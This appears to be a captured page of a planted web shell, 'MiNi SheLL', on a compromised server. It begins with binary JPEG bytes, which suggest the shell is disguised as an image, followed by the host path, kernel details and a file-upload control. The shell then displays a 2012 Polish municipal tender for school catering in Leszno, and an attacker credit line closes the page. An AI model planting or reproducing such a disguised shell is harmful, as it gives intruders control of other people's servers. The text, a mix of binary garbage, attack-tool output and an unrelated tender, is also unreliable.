JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120220/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120220/40933-N-2012.html

<p class="kh_header"><b>Leszno: Zorganizowanie żywienia dla uczniów uczęszczających na dodatkowe zajęcia w projekcie pn.  Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz poprawa jakości usług edukacyjnych w Zespole Szkół Publicznych w Lesznie.</b><br>
<b>Numer ogłoszenia: 40933 - 2012; data zamieszczenia: 20.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Leszno , Aleja  Wojska Polskiego 21, 05-084 Leszno, woj. mazowieckie, tel. 22 7258005, 7259035, 7258452, faks 22 7258552.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.leszno.bipgminy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie żywienia dla uczniów uczęszczających na dodatkowe zajęcia w projekcie pn.  Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz poprawa jakości usług edukacyjnych w Zespole Szkół Publicznych w Lesznie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zorganizowanie posiłków dla uczniów uczestniczących 
w dodatkowych zajęciach w ramach projektu Wyrównywanie szans edukacyjnych uczniów 
z grup o utrudnionym dostępie do edukacji oraz poprawa jakości usług edukacyjnych w Zespole Szkół Publicznych w Lesznie, nr umowy POKL.09.01.02-14-23908-00 zgodnie z prawem Unii Europejskiej oraz prawem krajowym. 
2. Posiłki będą przygotowywane dla uczniów, którzy będą brali udział w następujących zajęciach:
-dodatkowe zajęcia dydaktyczne z języka angielskiego dla klas I - III Szkoły Podstawowej: 
1 grupa 15 uczniów, zajęcia 2 x w tygodniu 
- dodatkowe zajęcia dydaktyczne Ekologia dla klas I-III SP: 1 grupa - 15 osób,  zajęcia 
2 x w tygodniu 
- dodatkowe zajęcia informatyczne dla uczniów klas I - III: 2 grupy po 20 uczniów, zajęcia 
2 x w tygodniu 
- dodatkowe zajęcia matematyczne dla uczniów klas I - III SP: 2 grupy po 10 uczniów, 
zajęcia 1 x w tygodniu 
- dodatkowe zajęcia z logopedii: 3 grupy po 6 uczniów, zajęcia 2 x w tygodniu 
- dodatkowe zajęcia z korektywy: 5 grup po 9 uczniów, zajęcia 2 x w tygodniu 
-dodatkowe zajęcia z języka niemieckiego dla uczniów klas IV - VI: 2 grupy po 10 uczniów, zajęcia 1 x w tygodniu 
- dodatkowe zajęcia matematyczne dla uczniów klas IV - VI: 1 grupa 10 uczniów, zajęcia 
2 x w tygodniu 
- dodatkowe zajęcia informatyczne dla uczniów klas IV - VI: 1 grupa 20 uczniów, zajęcia 
2 x w tygodniu 
- dodatkowe zajęcia ekologiczne dla uczniów klas IV - VI: 1 grupa 15 uczniów, zajęcia 
2 x w tygodniu 
- dodatkowe zajęcia polonistyczno - dziennikarskie dla uczniów klas IV - VI: 1 grupa 
10 uczniów, zajęcia 2 x w tygodniu 
- dodatkowe zajęcia z języka polskiego dla uczniów klas IV- VI: 9 grup - po 10 uczniów, zajęcia 1 x w tygodniu 
-dodatkowe zajęcia matematyczne dla uczniów klas IV - VI: 9 grup - po 10 uczniów, zajęcia 1 x w tygodniu 
- dodatkowe zajęcia z języka angielskiego dla uczniów klas I - III Gimnazjum: 1 grupa 15 uczniów, zajęcia 2 x w tygodniu 
- dodatkowe zajęcia z języka niemieckiego dla uczniów klas I - III Gimnazjum: 1 grupa 15 uczniów, zajęcia 2 x w tygodniu
- dodatkowe zajęcia matematyczne dla uczniów klas I - III Gimnazjum: 1 grupa 10 uczniów, zajęcia 1 x w tygodniu
-  dodatkowe zajęcia informatyczne dla uczniów klas I - III Gimnazjum: 1 grupa 20 uczniów, zajęcia 3 x w tygodniu 
- dodatkowe zajęcia z fizyki dla uczniów klas I - III Gimnazjum: 1 grupa 10 uczniów, zajęcia 2 x w tygodniu 
- dodatkowe zajęcia z chemii dla uczniów klas I - III Gimnazjum: 1 grupa 10 uczniów, zajęcia 1 x w tygodniu 
- dodatkowe zajęcia z biologii: 1 grupa 20 uczniów, zajęcia 1 x w tygodniu 
- doradztwo i opieka pedagogiczno - psychologiczna dla uczniów wykazujących problemy w nauce lub z innych przyczyn zagrożonych przedwczesnym wypadnięciem z systemu oświaty: 4 grupy po 5 uczniów.
3. Przygotowanie z dostarczeniem posiłków jednodaniowych jako drugie danie z dodatkiem owocu lub napoju lub ciastka lub batonu, na zasadzie cateringu.
Gotowe do spożycia posiłki mają być podawane w jednorazowych opakowaniach gwarantujących utrzymanie odpowiedniej temperatury. Nie mogą to być posiłki zimne. Posiłki zapakowane w opakowania jednorazowego użytku mają być przewożone w specjalnych termicznych pojemnikach  trzymających ciepło typu Lunch box.
Ogólna liczba dzieci objętych projektem to: 600 uczniów.
Posiłki będą rozdawane w dni powszednie od poniedziałku do piątku z wyjątkiem ferii zimowych i wiosennych, wakacji oraz dni wolnych od pracy. Lista uczniów uczęszczających na posiłki oraz propozycja menu będzie przekazywana faksem lub mailem do Wykonawcy 
z pięciodniowym wyprzedzeniem tj. na cały następny tydzień.
Posiłki wydawane będą w godz. około 15.00 -16.00, w dwóch etapach, 2 razy po 50 dzieci na stołówce. Przewiduje się nie więcej niż 100 dzieci dziennie korzystających z posiłków. 
Posiłek tj. drugie danie powinno odpowiadać wartości kalorycznej 600 Kcal. 
Przykładowe dania podstawowe na ciepło: pierogi z serem, kluseczki domowe leniwe, leczo 
z ryżem, placuszki z jabłkami, naleśniki z serem, spaghetti bolognese, naleśniki z owocami, pierogi z owocami. Przykładowe desery czy też słodkie dodatki do dania głównego to: napój, sok, galaretka z owocami, owoce w całości, batony, ciastka, ciasta.
Nie przewidujemy dań dietetycznych, nie stwierdzono uczestnictwa w projekcie dzieci 
z chorobą cukrzycową lub inną.
4. Wykonawca do ceny posiłku doliczy koszt opakowań jednorazowych  i sztućców oraz koszty transportu do Zespołu Szkół Publicznych w Lesznie, ul. Leśna 13 stołówka szkolna.
5. Po zakończeniu wydawania posiłków do obowiązków Wykonawcy będzie należało: uprzątnięcie stołówki z pozostawionych jednorazowych opakowań, serwetek, sztućców, itp., które należy wywieść własnym transportem i zutylizować na własny koszt. 
Należy umyć podłogę i zapastować.
6. Posiłki mają być przygotowywane z produktów świeżych, I gatunku, nieprzeterminowanych. Uczniowie mają otrzymywać posiłki ciepłe..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający zastrzega sobie możliwość przeprowadzenia usług uzupełniających na podstawie art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych, np. ze względu na ewentualną konieczność przedłużenia terminu realizacji projektu.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.52.40.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- posiadają wiedzę i doświadczenie tj. wykonali w okresie ostatnich 3 lat przed 
       upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy 
       - w tym okresie min. 1 zadanie odpowiadające swoim rodzajem oraz zakresem usługom 
       stanowiącym  przedmiot zamówienia,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- posiadanie samochodu dopuszczonego decyzją inspektora sanitarnego do przewozu posiłków
        dla potrzeb zbiorowego żywienia oraz  posiadanie termicznych pojemników trzymających
        ciepło typu Lunch box.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oferta cenowa (załącznik nr 1)
2. Oświadczenie o spełnieniu warunków określonych w art. 22 ust.1 ustawy Prawo zamówień publicznych (załącznik nr 2).
3. Oświadczenie o nie podleganiu wykluczenia na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych (załącznik nr 3).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>- ewentualna zmiana umowy może dotyczyć terminu realizacji projektu, może zostać on wydłużony, w związku z tym może też zajść potrzeba dokonania procedury dotyczącej usług uzupełniających,
 -  z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia 
proponowanych przez zamawiającego lub wykonawcę, jeżeli te zmiany są korzystne dla 
zamawiającego,
 -  z powodu wystąpienia dodatkowych okoliczności, niemożliwych do przewidzenia przed
zawarciem umowy,
 -  z powodu okoliczności siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez 
czynniki zewnętrzne, którego nie można było przewidzieć, w szczególności zagrażającego 
bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w dużych 
rozmiarach,
-  z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie
są konsekwencją winy którejkolwiek ze stron,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.leszno.bipgminy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Al. Wojska Polskiego 21, 05-084 Leszno - pok. nr 24.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2012 godzina 10:00, miejsce: Sekretariat Urzędu Gminy w Lesznie - pok. nr 30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com